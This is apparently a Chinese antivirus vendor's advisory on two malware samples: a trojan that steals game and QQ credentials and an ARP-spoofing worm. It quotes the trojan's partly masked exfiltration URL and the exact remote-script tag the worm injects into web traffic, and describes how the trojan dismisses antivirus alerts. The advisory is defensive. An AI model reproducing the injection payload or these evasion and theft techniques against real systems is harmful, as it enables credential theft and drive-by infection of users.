“ARP欺骗者”向局域网80端口发送病毒数据

"征途盗号者"(Win32.PSWTroj.OnlineGames.27136)这是一个盗号木马

"ARP欺骗者"(Packes.MakePE.a)这是一个具有ARP欺骗攻击的病毒

一、"征途盗号者"(Win32.PSWTroj.OnlineGames.27136) 威胁级别：★

此病毒运行后创建注册表启动项，以达到开机运行的作用，盗取客户计算机上的网络游戏《征途》、QQ、QQ游戏的账号信息。

1.判断病毒文件"upxdnd.dll"是否注入到以下进程：

zhengtu.dat
qq.exe
qqgame.exe

2.在客户计算机上创建事件"51343281"。

3.病毒创建线程，通过查找窗口的方法关闭卡巴的警告窗口和瑞星注册表监控提示窗口。

4.指定的接收网址：

hxxp://www.2**od.com/zt/get.php?srv=xx&id=xx&p=xx&s=xx&ss=xx&js=xx&gj=xx&dj=xx&yz=xx&jz=xx

二、"ARP欺骗者"(Packes.MakePE.a) 威胁级别：★★

病毒运行后会复制自身至系统文件夹，然后释放病毒文件，生成注册表启动项以开机运行。病毒会向局域网80端口发送病毒数据，修改网页源码，下载大量隐蔽软件安装至用户计算机。

发送 ARP 欺骗扫描局域网，劫持

172.16
192.10
10.0

开头的IP段，向发送至80端口的数据包中插入

"<script language=\"javascript\" src=\"http://f****t.8**0.org/ad.js\"></script>"

金山反病毒工程师建议

1.最好安装专业的杀毒软件进行全面监控。建议用户安装反病毒软件防止日益增多的病毒，用户在安装反病毒软件之后，应该经常进行升级、将一些主要监控经常打开（如邮件监控）、内存监控等，遇到问题要上报，这样才能真正保障计算机的安全。

2.玩网络游戏、利用QQ聊天的用户会有所增多，所以各类盗号木马必将随之增多，建议用户一定要养成良好的网络使用习惯，及时升级杀毒软件，开启防火墙以及实时监控等功能，切断病毒传播的途径，不给病毒以可乘之机。

最新相关文章

• ·PHPWind惊暴严重安全漏洞 官方补丁下载
• ·FTP客户端目录遍历漏洞可向任意位置写文件
• ·恶意网站排名 .hk和.cn域名危险性最高
• ·谨防“灰鸽子变种”远程控制 偷窃隐私
• ·第一个Linux病毒是在哪一年哪个地方暴出
• ·XP SP3被指包含易受侵害的旧版软件
• ·6.3毒报:AUTO键盘记录员监视键盘
• ·为用户安全! ESET NOD32增升级服务器
• ·Safari浏览器漏洞会导致Windows用户遭攻击
• ·5.29毒报:视觉控制监视电脑屏幕 完美世界盗号器
• ·红色警报：地震灾情网页暗藏“MIDI机器狗”木马
• ·5.28毒报：MS06-014漏洞下载器与黑客后门程序远程
• ·Flash插件存在漏洞 可被木马利用
• ·Google提供网站恶意软件侦测服务